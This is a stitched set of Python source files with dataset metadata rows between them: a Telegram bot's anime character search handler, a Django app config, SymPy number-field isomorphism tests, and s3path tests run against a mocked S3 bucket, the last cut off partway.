        temp = jikan.search("character", query[-1])
        buttons = []
        for i in range(5):
            try:
                temp_btn = [InlineKeyboardButton(temp["results"][i]["name"], f"char {temp['results'][i]['mal_id']}")]
                buttons.append(temp_btn)
            except IndexError:  # fewer than five search results
                break
        text = f"Search results for **{query[-1]}**:"
        await EMILIA.send_message(chat_id=message.chat.id, text=text, reply_markup=InlineKeyboardMarkup(buttons))
    except Exception as e:
        await EMILIA.send_message(chat_id=message.chat.id, text=f"**Error:**\n{e}")
| 46.470588 | 162 | 0.601582 | 387 | 3,160 | 4.79845 | 0.175711 | 0.106624 | 0.12601 | 0.106624 | 0.865913 | 0.850296 | 0.7986 | 0.7986 | 0.7986 | 0.725902 | 0 | 0.006337 | 0.250949 | 3,160 | 67 | 163 | 47.164179 | 0.7782 | 0 | 0 | 0.688525 | 0 | 0 | 0.173295 | 0.055609 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.065574 | 0 | 0.114754 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
918a48fb2e38e63f3f84c03a6ed724fe30b5f0b7 | 193 | py | Python | backend/currency_exchanger/wallets/apps.py | norbertcyran/currency-exchanger | 8896c1ad3981662d6ca0395e4c0aba6ac93f9eac | [
"MIT"
] | null | null | null | backend/currency_exchanger/wallets/apps.py | norbertcyran/currency-exchanger | 8896c1ad3981662d6ca0395e4c0aba6ac93f9eac | [
"MIT"
] | null | null | null | backend/currency_exchanger/wallets/apps.py | norbertcyran/currency-exchanger | 8896c1ad3981662d6ca0395e4c0aba6ac93f9eac | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class WalletsConfig(AppConfig):
name = "currency_exchanger.wallets"
def ready(self):
        import currency_exchanger.wallets.signals  # noqa: F401
| 21.444444 | 62 | 0.740933 | 22 | 193 | 6.409091 | 0.772727 | 0.241135 | 0.340426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019108 | 0.186529 | 193 | 8 | 63 | 24.125 | 0.878981 | 0.046632 | 0 | 0 | 0 | 0 | 0.142857 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.4 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
918e19a694a9cfd355b6d91338fbcea9305628c0 | 11,573 | py | Python | sympy/polys/numberfields/tests/test_subfield.py | utkarshdeorah/sympy | dcdf59bbc6b13ddbc329431adf72fcee294b6389 | [
"BSD-3-Clause"
] | 1 | 2020-09-09T20:40:17.000Z | 2020-09-09T20:40:17.000Z | sympy/polys/numberfields/tests/test_subfield.py | utkarshdeorah/sympy | dcdf59bbc6b13ddbc329431adf72fcee294b6389 | [
"BSD-3-Clause"
] | 14 | 2018-02-08T10:11:03.000Z | 2019-04-16T10:32:46.000Z | sympy/polys/numberfields/tests/test_subfield.py | utkarshdeorah/sympy | dcdf59bbc6b13ddbc329431adf72fcee294b6389 | [
"BSD-3-Clause"
] | 1 | 2020-09-09T20:41:34.000Z | 2020-09-09T20:41:34.000Z | """Tests for the subfield problem and allied problems. """
from sympy.core.numbers import (AlgebraicNumber, I, Rational)
from sympy.core.singleton import S
from sympy.functions.elementary.miscellaneous import sqrt
from sympy.polys.numberfields.subfield import (
is_isomorphism_possible,
field_isomorphism_pslq,
field_isomorphism,
primitive_element,
to_number_field,
)
from sympy.polys.polyerrors import IsomorphismFailed
from sympy.polys.polytools import Poly
from sympy.testing.pytest import raises
from sympy.abc import x
Q = Rational
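# field_isomorphism(a, b) returns the coefficients, highest degree first, of a
# polynomial p with p(b) == a, i.e. an embedding of Q(a) into Q(b); it returns
# None when no such embedding exists.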
def test_field_isomorphism_pslq():
a = AlgebraicNumber(I)
b = AlgebraicNumber(I*sqrt(3))
raises(NotImplementedError, lambda: field_isomorphism_pslq(a, b))
a = AlgebraicNumber(sqrt(2))
b = AlgebraicNumber(sqrt(3))
c = AlgebraicNumber(sqrt(7))
d = AlgebraicNumber(sqrt(2) + sqrt(3))
e = AlgebraicNumber(sqrt(2) + sqrt(3) + sqrt(7))
assert field_isomorphism_pslq(a, a) == [1, 0]
assert field_isomorphism_pslq(a, b) is None
assert field_isomorphism_pslq(a, c) is None
assert field_isomorphism_pslq(a, d) == [Q(1, 2), 0, -Q(9, 2), 0]
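    # Worked check: with d = sqrt(2) + sqrt(3), d**3 = 11*sqrt(2) + 9*sqrt(3),
    # so d**3/2 - 9*d/2 = sqrt(2), matching the coefficients [1/2, 0, -9/2, 0].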
assert field_isomorphism_pslq(
a, e) == [Q(1, 80), 0, -Q(1, 2), 0, Q(59, 20), 0]
assert field_isomorphism_pslq(b, a) is None
assert field_isomorphism_pslq(b, b) == [1, 0]
assert field_isomorphism_pslq(b, c) is None
assert field_isomorphism_pslq(b, d) == [-Q(1, 2), 0, Q(11, 2), 0]
assert field_isomorphism_pslq(b, e) == [-Q(
3, 640), 0, Q(67, 320), 0, -Q(297, 160), 0, Q(313, 80), 0]
assert field_isomorphism_pslq(c, a) is None
assert field_isomorphism_pslq(c, b) is None
assert field_isomorphism_pslq(c, c) == [1, 0]
assert field_isomorphism_pslq(c, d) is None
assert field_isomorphism_pslq(c, e) == [Q(
3, 640), 0, -Q(71, 320), 0, Q(377, 160), 0, -Q(469, 80), 0]
assert field_isomorphism_pslq(d, a) is None
assert field_isomorphism_pslq(d, b) is None
assert field_isomorphism_pslq(d, c) is None
assert field_isomorphism_pslq(d, d) == [1, 0]
assert field_isomorphism_pslq(d, e) == [-Q(
3, 640), 0, Q(71, 320), 0, -Q(377, 160), 0, Q(549, 80), 0]
assert field_isomorphism_pslq(e, a) is None
assert field_isomorphism_pslq(e, b) is None
assert field_isomorphism_pslq(e, c) is None
assert field_isomorphism_pslq(e, d) is None
assert field_isomorphism_pslq(e, e) == [1, 0]
f = AlgebraicNumber(3*sqrt(2) + 8*sqrt(7) - 5)
assert field_isomorphism_pslq(
f, e) == [Q(3, 80), 0, -Q(139, 80), 0, Q(347, 20), 0, -Q(761, 20), -5]
def test_field_isomorphism():
assert field_isomorphism(3, sqrt(2)) == [3]
assert field_isomorphism( I*sqrt(3), I*sqrt(3)/2) == [ 2, 0]
assert field_isomorphism(-I*sqrt(3), I*sqrt(3)/2) == [-2, 0]
assert field_isomorphism( I*sqrt(3), -I*sqrt(3)/2) == [-2, 0]
assert field_isomorphism(-I*sqrt(3), -I*sqrt(3)/2) == [ 2, 0]
assert field_isomorphism( 2*I*sqrt(3)/7, 5*I*sqrt(3)/3) == [ Rational(6, 35), 0]
assert field_isomorphism(-2*I*sqrt(3)/7, 5*I*sqrt(3)/3) == [Rational(-6, 35), 0]
assert field_isomorphism( 2*I*sqrt(3)/7, -5*I*sqrt(3)/3) == [Rational(-6, 35), 0]
assert field_isomorphism(-2*I*sqrt(3)/7, -5*I*sqrt(3)/3) == [ Rational(6, 35), 0]
assert field_isomorphism(
2*I*sqrt(3)/7 + 27, 5*I*sqrt(3)/3) == [ Rational(6, 35), 27]
assert field_isomorphism(
-2*I*sqrt(3)/7 + 27, 5*I*sqrt(3)/3) == [Rational(-6, 35), 27]
assert field_isomorphism(
2*I*sqrt(3)/7 + 27, -5*I*sqrt(3)/3) == [Rational(-6, 35), 27]
assert field_isomorphism(
-2*I*sqrt(3)/7 + 27, -5*I*sqrt(3)/3) == [ Rational(6, 35), 27]
p = AlgebraicNumber( sqrt(2) + sqrt(3))
q = AlgebraicNumber(-sqrt(2) + sqrt(3))
r = AlgebraicNumber( sqrt(2) - sqrt(3))
s = AlgebraicNumber(-sqrt(2) - sqrt(3))
pos_coeffs = [ S.Half, S.Zero, Rational(-9, 2), S.Zero]
neg_coeffs = [Rational(-1, 2), S.Zero, Rational(9, 2), S.Zero]
a = AlgebraicNumber(sqrt(2))
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == pos_coeffs
assert field_isomorphism(a, q, fast=True) == neg_coeffs
assert field_isomorphism(a, r, fast=True) == pos_coeffs
assert field_isomorphism(a, s, fast=True) == neg_coeffs
assert field_isomorphism(a, p, fast=False) == pos_coeffs
assert field_isomorphism(a, q, fast=False) == neg_coeffs
assert field_isomorphism(a, r, fast=False) == pos_coeffs
assert field_isomorphism(a, s, fast=False) == neg_coeffs
a = AlgebraicNumber(-sqrt(2))
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == neg_coeffs
assert field_isomorphism(a, q, fast=True) == pos_coeffs
assert field_isomorphism(a, r, fast=True) == neg_coeffs
assert field_isomorphism(a, s, fast=True) == pos_coeffs
assert field_isomorphism(a, p, fast=False) == neg_coeffs
assert field_isomorphism(a, q, fast=False) == pos_coeffs
assert field_isomorphism(a, r, fast=False) == neg_coeffs
assert field_isomorphism(a, s, fast=False) == pos_coeffs
pos_coeffs = [ S.Half, S.Zero, Rational(-11, 2), S.Zero]
neg_coeffs = [Rational(-1, 2), S.Zero, Rational(11, 2), S.Zero]
a = AlgebraicNumber(sqrt(3))
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == neg_coeffs
assert field_isomorphism(a, q, fast=True) == neg_coeffs
assert field_isomorphism(a, r, fast=True) == pos_coeffs
assert field_isomorphism(a, s, fast=True) == pos_coeffs
assert field_isomorphism(a, p, fast=False) == neg_coeffs
assert field_isomorphism(a, q, fast=False) == neg_coeffs
assert field_isomorphism(a, r, fast=False) == pos_coeffs
assert field_isomorphism(a, s, fast=False) == pos_coeffs
a = AlgebraicNumber(-sqrt(3))
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == pos_coeffs
assert field_isomorphism(a, q, fast=True) == pos_coeffs
assert field_isomorphism(a, r, fast=True) == neg_coeffs
assert field_isomorphism(a, s, fast=True) == neg_coeffs
assert field_isomorphism(a, p, fast=False) == pos_coeffs
assert field_isomorphism(a, q, fast=False) == pos_coeffs
assert field_isomorphism(a, r, fast=False) == neg_coeffs
assert field_isomorphism(a, s, fast=False) == neg_coeffs
pos_coeffs = [ Rational(3, 2), S.Zero, Rational(-33, 2), -S(8)]
neg_coeffs = [Rational(-3, 2), S.Zero, Rational(33, 2), -S(8)]
a = AlgebraicNumber(3*sqrt(3) - 8)
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == neg_coeffs
assert field_isomorphism(a, q, fast=True) == neg_coeffs
assert field_isomorphism(a, r, fast=True) == pos_coeffs
assert field_isomorphism(a, s, fast=True) == pos_coeffs
assert field_isomorphism(a, p, fast=False) == neg_coeffs
assert field_isomorphism(a, q, fast=False) == neg_coeffs
assert field_isomorphism(a, r, fast=False) == pos_coeffs
assert field_isomorphism(a, s, fast=False) == pos_coeffs
a = AlgebraicNumber(3*sqrt(2) + 2*sqrt(3) + 1)
pos_1_coeffs = [ S.Half, S.Zero, Rational(-5, 2), S.One]
neg_5_coeffs = [Rational(-5, 2), S.Zero, Rational(49, 2), S.One]
pos_5_coeffs = [ Rational(5, 2), S.Zero, Rational(-49, 2), S.One]
neg_1_coeffs = [Rational(-1, 2), S.Zero, Rational(5, 2), S.One]
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == pos_1_coeffs
assert field_isomorphism(a, q, fast=True) == neg_5_coeffs
assert field_isomorphism(a, r, fast=True) == pos_5_coeffs
assert field_isomorphism(a, s, fast=True) == neg_1_coeffs
assert field_isomorphism(a, p, fast=False) == pos_1_coeffs
assert field_isomorphism(a, q, fast=False) == neg_5_coeffs
assert field_isomorphism(a, r, fast=False) == pos_5_coeffs
assert field_isomorphism(a, s, fast=False) == neg_1_coeffs
a = AlgebraicNumber(sqrt(2))
b = AlgebraicNumber(sqrt(3))
c = AlgebraicNumber(sqrt(7))
assert is_isomorphism_possible(a, b) is True
assert is_isomorphism_possible(b, a) is True
assert is_isomorphism_possible(c, p) is False
assert field_isomorphism(sqrt(2), sqrt(3), fast=True) is None
assert field_isomorphism(sqrt(3), sqrt(2), fast=True) is None
assert field_isomorphism(sqrt(2), sqrt(3), fast=False) is None
assert field_isomorphism(sqrt(3), sqrt(2), fast=False) is None
a = AlgebraicNumber(sqrt(2))
b = AlgebraicNumber(2 ** (S(1) / 3))
assert is_isomorphism_possible(a, b) is False
assert field_isomorphism(a, b) is None
def test_primitive_element():
assert primitive_element([sqrt(2)], x) == (x**2 - 2, [1])
assert primitive_element(
[sqrt(2), sqrt(3)], x) == (x**4 - 10*x**2 + 1, [1, 1])
assert primitive_element([sqrt(2)], x, polys=True) == (Poly(x**2 - 2, domain='QQ'), [1])
    assert primitive_element([sqrt(2), sqrt(3)], x, polys=True) == \
        (Poly(x**4 - 10*x**2 + 1, domain='QQ'), [1, 1])
assert primitive_element(
[sqrt(2)], x, ex=True) == (x**2 - 2, [1], [[1, 0]])
    assert primitive_element([sqrt(2), sqrt(3)], x, ex=True) == \
        (x**4 - 10*x**2 + 1, [1, 1],
         [[Q(1, 2), 0, -Q(9, 2), 0], [-Q(1, 2), 0, Q(11, 2), 0]])
assert primitive_element(
[sqrt(2)], x, ex=True, polys=True) == (Poly(x**2 - 2, domain='QQ'), [1], [[1, 0]])
    assert primitive_element([sqrt(2), sqrt(3)], x, ex=True, polys=True) == \
        (Poly(x**4 - 10*x**2 + 1, domain='QQ'), [1, 1],
         [[Q(1, 2), 0, -Q(9, 2), 0], [-Q(1, 2), 0, Q(11, 2), 0]])
assert primitive_element([sqrt(2)], polys=True) == (Poly(x**2 - 2), [1])
raises(ValueError, lambda: primitive_element([], x, ex=False))
raises(ValueError, lambda: primitive_element([], x, ex=True))
# Issue 14117
a, b = I*sqrt(2*sqrt(2) + 3), I*sqrt(-2*sqrt(2) + 3)
assert primitive_element([a, b, I], x) == (x**4 + 6*x**2 + 1, [1, 0, 0])
def test_to_number_field():
assert to_number_field(sqrt(2)) == AlgebraicNumber(sqrt(2))
assert to_number_field(
[sqrt(2), sqrt(3)]) == AlgebraicNumber(sqrt(2) + sqrt(3))
a = AlgebraicNumber(sqrt(2) + sqrt(3), [S.Half, S.Zero, Rational(-9, 2), S.Zero])
assert to_number_field(sqrt(2), sqrt(2) + sqrt(3)) == a
assert to_number_field(sqrt(2), AlgebraicNumber(sqrt(2) + sqrt(3))) == a
raises(IsomorphismFailed, lambda: to_number_field(sqrt(2), sqrt(3)))
def test_issue_22561():
a = to_number_field(sqrt(2), sqrt(2) + sqrt(3))
b = to_number_field(sqrt(2), sqrt(2) + sqrt(5))
assert field_isomorphism(a, b) == [1, 0]
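def test_isomorphism_coefficient_meaning():
    # Illustrative sanity check (a sketch): the coefficient lists above
    # express one algebraic number as a polynomial in the other's primitive
    # element, highest power first.  E.g. [Q(1, 2), 0, -Q(9, 2), 0] encodes
    # sqrt(2) == t**3/2 - 9*t/2 for t = sqrt(2) + sqrt(3):
    t = sqrt(2) + sqrt(3)
    assert (t**3/2 - 9*t/2).expand() == sqrt(2)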
| 39.906897 | 92 | 0.654368 | 1,865 | 11,573 | 3.903485 | 0.0563 | 0.215385 | 0.281044 | 0.157967 | 0.867308 | 0.834066 | 0.756868 | 0.649038 | 0.620742 | 0.536126 | 0 | 0.051364 | 0.189147 | 11,573 | 289 | 93 | 40.044983 | 0.724425 | 0.005617 | 0 | 0.378505 | 0 | 0 | 0.000696 | 0 | 0 | 0 | 0 | 0 | 0.630841 | 1 | 0.023364 | false | 0 | 0.037383 | 0 | 0.060748 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
37d896b1ce285001c2362b684c811ebd33ff8790 | 22,111 | py | Python | tests/test_path_operations.py | Darkheir/s3path | 238f6ff0abf1a3199c8f17d58c778d72b03f10a2 | [
"Apache-2.0"
] | null | null | null | tests/test_path_operations.py | Darkheir/s3path | 238f6ff0abf1a3199c8f17d58c778d72b03f10a2 | [
"Apache-2.0"
] | null | null | null | tests/test_path_operations.py | Darkheir/s3path | 238f6ff0abf1a3199c8f17d58c778d72b03f10a2 | [
"Apache-2.0"
] | null | null | null | import sys
from pathlib import Path
from io import UnsupportedOperation
from tempfile import NamedTemporaryFile
import boto3
from botocore.exceptions import ClientError
import pytest
from s3path import PureS3Path, S3Path, StatResult
# todo: test samefile/touch method
# todo: test security and boto config changes
# todo: test open method check R/W bytes/unicode
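# a hedged sketch for the samefile/touch todo above (assumes S3Path mirrors
# pathlib's touch()/samefile() signatures -- verify against the real API):
#
#   def test_touch_and_samefile(s3_mock):
#       s3 = boto3.resource('s3')
#       s3.create_bucket(Bucket='test-bucket')
#       path = S3Path('/test-bucket/touched.test')
#       path.touch()
#       assert path.exists()
#       assert path.samefile(S3Path('/test-bucket/touched.test'))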
def test_path_support():
assert PureS3Path in S3Path.mro()
assert Path in S3Path.mro()
def test_stat(s3_mock):
path = S3Path('fake-bucket/fake-key')
with pytest.raises(ValueError):
path.stat()
path = S3Path('/fake-bucket/fake-key')
with pytest.raises(ClientError):
path.stat()
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'Test.test')
object_summary.put(Body=b'test data')
path = S3Path('/test-bucket/Test.test')
stat = path.stat()
assert isinstance(stat, StatResult)
assert stat == StatResult(
size=object_summary.size,
last_modified=object_summary.last_modified,
)
with NamedTemporaryFile() as local_file:
local_file.write(path.read_bytes())
local_file.flush()
local_path = Path(local_file.name)
local_stat = local_path.stat()
s3_stat = path.stat()
assert s3_stat.st_size == local_stat.st_size == s3_stat.size
assert s3_stat.last_modified.timestamp() == s3_stat.st_mtime
assert s3_stat.st_mtime < local_stat.st_mtime
with pytest.raises(UnsupportedOperation):
path.stat().st_atime
path = S3Path('/test-bucket')
assert path.stat() is None
def test_exists(s3_mock):
path = S3Path('./fake-key')
with pytest.raises(ValueError):
path.exists()
path = S3Path('/fake-bucket/fake-key')
with pytest.raises(ClientError):
path.exists()
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
assert not S3Path('/test-bucket/Test.test').exists()
path = S3Path('/test-bucket/directory/Test.test')
assert path.exists()
for parent in path.parents:
assert parent.exists()
def test_glob(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
assert list(S3Path('/test-bucket/').glob('*.test')) == []
assert list(S3Path('/test-bucket/directory/').glob('*.test')) == [S3Path('/test-bucket/directory/Test.test')]
assert list(S3Path('/test-bucket/').glob('**/*.test')) == [S3Path('/test-bucket/directory/Test.test')]
object_summary = s3.ObjectSummary('test-bucket', 'pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'setup.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'test_pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'build/lib/pathlib.py')
object_summary.put(Body=b'test data')
assert sorted(S3Path.from_uri('s3://test-bucket/').glob('*.py')) == [
S3Path('/test-bucket/pathlib.py'),
S3Path('/test-bucket/setup.py'),
S3Path('/test-bucket/test_pathlib.py')]
assert sorted(S3Path.from_uri('s3://test-bucket/').glob('*/*.py')) == [S3Path('/test-bucket/docs/conf.py')]
assert sorted(S3Path.from_uri('s3://test-bucket/').glob('**/*.py')) == [
S3Path('/test-bucket/build/lib/pathlib.py'),
S3Path('/test-bucket/docs/conf.py'),
S3Path('/test-bucket/pathlib.py'),
S3Path('/test-bucket/setup.py'),
S3Path('/test-bucket/test_pathlib.py')]
assert sorted(S3Path.from_uri('s3://test-bucket/').glob('*cs')) == [
S3Path('/test-bucket/docs/'),
]
def test_rglob(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
assert list(S3Path('/test-bucket/').rglob('*.test')) == [S3Path('/test-bucket/directory/Test.test')]
assert list(S3Path('/test-bucket/').rglob('**/*.test')) == [S3Path('/test-bucket/directory/Test.test')]
object_summary = s3.ObjectSummary('test-bucket', 'pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'setup.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'test_pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'build/lib/pathlib.py')
object_summary.put(Body=b'test data')
assert sorted(S3Path.from_uri('s3://test-bucket/').rglob('*.py')) == [
S3Path('/test-bucket/build/lib/pathlib.py'),
S3Path('/test-bucket/docs/conf.py'),
S3Path('/test-bucket/pathlib.py'),
S3Path('/test-bucket/setup.py'),
S3Path('/test-bucket/test_pathlib.py')]
def test_is_dir(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'setup.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'test_pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'build/lib/pathlib.py')
object_summary.put(Body=b'test data')
assert not S3Path('/test-bucket/fake.test').is_dir()
assert not S3Path('/test-bucket/fake/').is_dir()
assert S3Path('/test-bucket/directory').is_dir()
assert not S3Path('/test-bucket/directory/Test.test').is_dir()
assert not S3Path('/test-bucket/pathlib.py').is_dir()
assert not S3Path('/test-bucket/docs/conf.py').is_dir()
assert S3Path('/test-bucket/docs/').is_dir()
assert S3Path('/test-bucket/build/').is_dir()
assert S3Path('/test-bucket/build/lib').is_dir()
assert not S3Path('/test-bucket/build/lib/pathlib.py').is_dir()
def test_is_file(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'setup.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'test_pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'build/lib/pathlib.py')
object_summary.put(Body=b'test data')
assert not S3Path('/test-bucket/fake.test').is_file()
assert not S3Path('/test-bucket/fake/').is_file()
assert not S3Path('/test-bucket/directory').is_file()
assert S3Path('/test-bucket/directory/Test.test').is_file()
assert S3Path('/test-bucket/pathlib.py').is_file()
assert S3Path('/test-bucket/docs/conf.py').is_file()
assert not S3Path('/test-bucket/docs/').is_file()
assert not S3Path('/test-bucket/build/').is_file()
assert not S3Path('/test-bucket/build/lib').is_file()
assert S3Path('/test-bucket/build/lib/pathlib.py').is_file()
def test_read_line(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data\ntest data')
with S3Path('/test-bucket/directory/Test.test').open("r") as fp:
assert fp.readline() == "test data"
assert fp.readline() == "test data"
assert fp.readline() == ""
def test_read_lines(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data\ntest data')
with S3Path('/test-bucket/directory/Test.test').open("r") as fp:
assert len(fp.readlines()) == 2
def test_read_lines_hint(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data\ntest data')
with S3Path('/test-bucket/directory/Test.test').open("r") as fp:
assert len(fp.readlines(1)) == 1
def test_iter_lines(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data\ntest data')
with S3Path('/test-bucket/directory/Test.test').open("r") as fp:
for line in fp:
assert line == "test data"
def test_write_lines(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
path = S3Path('/test-bucket/directory/Test.test')
with path.open("w") as fp:
fp.writelines(["line 1\n", "line 2\n"])
res = path.read_text().splitlines()
assert len(res) == 2
def test_iterdir(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'setup.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'test_pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'build/lib/pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/make.bat')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/index.rst')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/Makefile')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_templates/11conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_build/22conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_static/conf.py')
object_summary.put(Body=b'test data')
s3_path = S3Path('/test-bucket/docs')
assert sorted(s3_path.iterdir()) == [
S3Path('/test-bucket/docs/Makefile'),
S3Path('/test-bucket/docs/_build'),
S3Path('/test-bucket/docs/_static'),
S3Path('/test-bucket/docs/_templates'),
S3Path('/test-bucket/docs/conf.py'),
S3Path('/test-bucket/docs/index.rst'),
S3Path('/test-bucket/docs/make.bat'),
]
def test_iterdir_on_buckets(s3_mock):
s3 = boto3.resource('s3')
for index in range(4):
s3.create_bucket(Bucket='test-bucket{}'.format(index))
s3_root_path = S3Path('/')
assert sorted(s3_root_path.iterdir()) == [
S3Path('/test-bucket{}'.format(index))
for index in range(4)
]
def test_open_for_reading(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
path = S3Path('/test-bucket/directory/Test.test')
file_obj = path.open()
assert file_obj.read() == 'test data'
def test_open_for_write(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
bucket = s3.Bucket('test-bucket')
assert sum(1 for _ in bucket.objects.all()) == 0
path = S3Path('/test-bucket/directory/Test.test')
file_obj = path.open(mode='bw')
assert file_obj.writable()
file_obj.write(b'test data\n')
file_obj.writelines([b'test data'])
assert sum(1 for _ in bucket.objects.all()) == 1
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
streaming_body = object_summary.get()['Body']
assert list(streaming_body.iter_lines()) == [
b'test data',
b'test data'
]
def test_open_binary_read(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
path = S3Path('/test-bucket/directory/Test.test')
with path.open(mode='br') as file_obj:
assert file_obj.readlines() == [b'test data']
with path.open(mode='rb') as file_obj:
assert file_obj.readline() == b'test data'
assert file_obj.readline() == b''
assert file_obj.readline() == b''
@pytest.mark.skipif(sys.version_info < (3, 5), reason="requires python3.5 or higher")
